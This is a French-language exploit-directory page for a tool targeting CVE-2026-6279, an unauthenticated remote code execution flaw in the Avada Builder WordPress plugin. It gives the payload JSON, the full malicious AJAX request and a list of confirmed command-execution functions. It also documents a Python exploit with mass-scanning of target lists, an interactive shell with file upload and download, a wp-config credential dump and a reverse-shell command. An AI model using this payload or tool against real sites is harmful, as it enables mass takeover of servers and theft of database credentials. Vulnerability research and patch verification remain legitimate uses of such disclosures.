Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-6279 — CVE-2026-6279 : Avada (Fusion) Builder <= 3.15.2 – Exécution de code à distance non authentifiée via injection de fonction PHP via l'attribut de shortcode « render_logics » via le gestionnaire AJAX de widget (fusion-builder) | Kitploit
Outils/GitHubGitHub/xxconi/cve-2026-6279
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubxxconi/cve-2026-6279

CVE-2026-6279

CVE-2026-6279 : Avada (Fusion) Builder <= 3.15.2 – Exécution de code à distance non authentifiée via injection de fonction PHP via l'attribut de shortcode « render_logics » via le gestionnaire AJAX de widget (fusion-builder)

Voir le dépôt
17il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
╔══════════════════════════════════════════════════════════════╗ ║ CVE-2026-6279 · Avada Builder <= 3.15.2 ║ ║ Unauthenticated RCE via call_user_func() ║ ╚══════════════════════════════════════════════════════════════╝ ```

CVE CVSS Auth Plugin Installs Python


📋 Résumé

ChampDétail
CVE IDCVE-2026-6279
AffecteAvada Builder (Fusion Builder) <= 3.15.2
ThèmeWordPress Avada Theme
Installations actives900.000+
Type de vulnérabilitéPHP Function Injection → Unauthenticated RCE
CVSS v3.19.8 (Critical)
VecteurCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Authentification❌ Non requise
Interaction utilisateur❌ Non requise
Chercheurxxcoin
Date de publication2026-05-24

🔗 Chaîne d'attaque

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  1. DÉTECTION DU NONCE                                          │
│     wp_create_nonce('fusion_load_nonce') → UID 0               │
│     [fusion_post_cards] ou [fusion_table_of_contents]          │
│     ajouté dans le JS sur les pages publiques contenant        │
│     le shortcode                                                │
│                          │                                      │
│                          ▼                                      │
│  2. AJAX NON AUTHENTIFIÉ                                        │
│     wp_ajax_nopriv_fusion_get_widget_markup                     │
│     check_ajax_referer() → vérifie uniquement la validité      │
│     du nonce, n'authentifie pas l'utilisateur                   │
│                          │                                      │
│                          ▼                                      │
│  3. DÉSÉRIALISATION                                             │
│     base64_decode(render_logics) → json_decode()               │
│     Pas de validation de structure — JSON contrôlé par         │
│     l'attaquant                                                 │
│                          │                                      │
│                          ▼                                      │
│  4. call_user_func() — AUCUNE LISTE BLANCHE                     │
│     get_value() → cas wp_conditional_tags                      │
│     call_user_func($value['function'], $value['args'])         │
│     N'importe quelle fonction PHP peut être appelée            │
│                          │                                      │
│                          ▼                                      │
│  5. RCE ✓                                                       │
│     system("id") → uid=1000(xxcoin)                         │
│     Exécution complète de commandes avec les droits du         │
│     serveur web                                                 │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

🧬 Détail technique

Point de vulnérabilité

class-fusion-builder-conditional-render-helper.php — L1531 :

root@kitploit:~
// CODE VULNÉRABLE
case 'wp_conditional_tags':
    $decoded = json_decode( base64_decode( $render_logics ), true );
    // ❌ Aucune vérification de liste blanche
    return call_user_func( $decoded['function'], $decoded['args'] );

Structure du Payload

root@kitploit:~
{
  "type": "wp_conditional_tags",
  "value": {
    "function": "system",
    "args": "id"
  }
}

Encodé en Base64 et envoyé dans le champ POST render_logics.

Requête HTTP

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

action=fusion_get_widget_markup
fusion_load_nonce=<nonce>
render_logics=<base64_payload>
widget_type=WP_Widget_Recent_Posts
type=WP_Widget_Recent_Posts
widget_id=2
number=2

✅ Fonctions RCE vérifiées

FonctionArgumentRésultatStatut
system()iduid=1000(xenon1337)✅ Réussite
passthru()iduid=1000(xenon1337)✅ Réussite
shell_exec()iduid=1000(xenon1337)✅ Réussite
exec()iduid=1000(xenon1337)✅ Réussite
file_get_contents()/etc/passwdroot:x:0:0:...✅ Réussite
proc_open()——❌ Nécessite 2+ arguments
popen()——❌ Nécessite 2+ arguments

Note : call_user_func($fn, $arg) n'accepte qu'un seul argument par nature. Les fonctions nécessitant 2+ arguments (comme proc_open, popen) ne peuvent pas être déclenchées via cette vulnérabilité.


🔑 Pourquoi le nonce peut-il être contourné ?

root@kitploit:~
1. Avada génère le fusion_load_nonce pour l'UID 0 (utilisateur public)
2. Sur les pages contenant les shortcodes [fusion_post_cards] ou
   [fusion_table_of_contents], le nonce est inclus dans la sortie JS
   → tout le monde peut le voir
3. check_ajax_referer('fusion_load_nonce') vérifie uniquement la
   validité du nonce — n'authentifie pas l'utilisateur
4. Résultat : N'importe quel visiteur peut récupérer le nonce et
   appeler l'endpoint

📁 Références du code source

FichierLigneFonctionDescription
class-fusion-builder-conditional-render-helper.phpL1083should_render()Désérialisation de render_logics
class-fusion-builder-conditional-render-helper.phpL1531get_value()⚠️ call_user_func() — aucune liste blanche
fusion-widget.phpL44—Connexion render_logics
fusion-widget.phpL389—Enregistrement du handler AJAX wp_ajax_nopriv
class-fusion-builder.phpL7551—Enregistrement du nonce déterministe pour UID 0

🚀 Installation et utilisation

Prérequis

root@kitploit:~
pip install requests packaging

Utilisation

root@kitploit:~
# Mode menu (cible unique + lot)
python3 CVE-2026-6279.py

# Sans protocole (détection automatique)
python3 CVE-2026-6279.py target.com

# Avec protocole
python3 CVE-2026-6279.py http://target.com
python3 CVE-2026-6279.py https://target.com

# Avec port
python3 CVE-2026-6279.py target.com:8080
python3 CVE-2026-6279.py http://target.com:8080

Menu

root@kitploit:~
♡ [1]  Cible unique · shell interactif
◆ [2]  Scan par lot · exploitation de fichier
✗ [3]  Quitter

Commandes du shell interactif

root@kitploit:~
shell> id                          # exécuter une commande
shell> cd /var/www/html            # changer de répertoire
shell> upload local.php /tmp/x.php # uploader un fichier
shell> download /etc/passwd        # télécharger un fichier
shell> wp-config                   # informations de la base de données
shell> recon                       # scan du système
shell> revshell 10.0.0.1 4444      # reverse shell
shell> exit                        # quitter

Scan par lot

root@kitploit:~
# Format de targets.txt :
target1.com
http://target2.com
https://target3.com:8080
# ligne de commentaire (ignorée)
root@kitploit:~
♡ fichier de cibles [targets.txt] :
♡ threads [10] : 30
♡ commande [id] :
♡ fichier de sortie [vuln.txt] :

🖥️ Sortie du PoC

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-6279  ·  Avada Builder <= 3.15.2                  ║
║  Unauthenticated RCE via call_user_func()                    ║
║  Copyright © 2026 xxcoin  ·  Merci : xxcoin 💜 ║
╚══════════════════════════════════════════════════════════════╝

★ Avada détecté ! (http://localhost:8888)
★ nonce : b6d7b084c2  (src: /blog/)  [shortcode✓]
★ AJAX : http://localhost:8888/wp-admin/admin-ajax.php
★ RCE : system() [B] [WP_Widget_Recent_Posts]
  • uid=1000(xxcoin) gid=1000(xxcoin) groups=1000

shell> uname -a
  • Linux debian 6.1.0-21-amd64 #1 SMP x86_64 GNU/Linux
shell> wp-config
  • DB_NAME=wordpress
  • DB_USER=wp_user
  • DB_PASSWORD=s3cr3t_p4ss!
  • DB_HOST=localhost

📊 CVSS v3.1

MétriqueValeur
Vecteur d'attaqueNetwork
Complexité d'attaqueLow
Privilèges requisNone
Interaction utilisateurNone
PérimètreUnchanged
ConfidentialitéHigh
IntégritéHigh
DisponibilitéHigh
Score total9.8 — CRITICAL
root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

⚠️ Avertissement légal

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes est illégal. Toute responsabilité incombe à l'utilisateur.


telegram. https://t.me/+-GYq8ydL9AYwZGI8)

CVE-2026-6279 · Avada Builder <= 3.15.2 · xxcoin · 2026

Remerciements spéciaux : Shadow Girlfriend 💜

Télécharger l’outil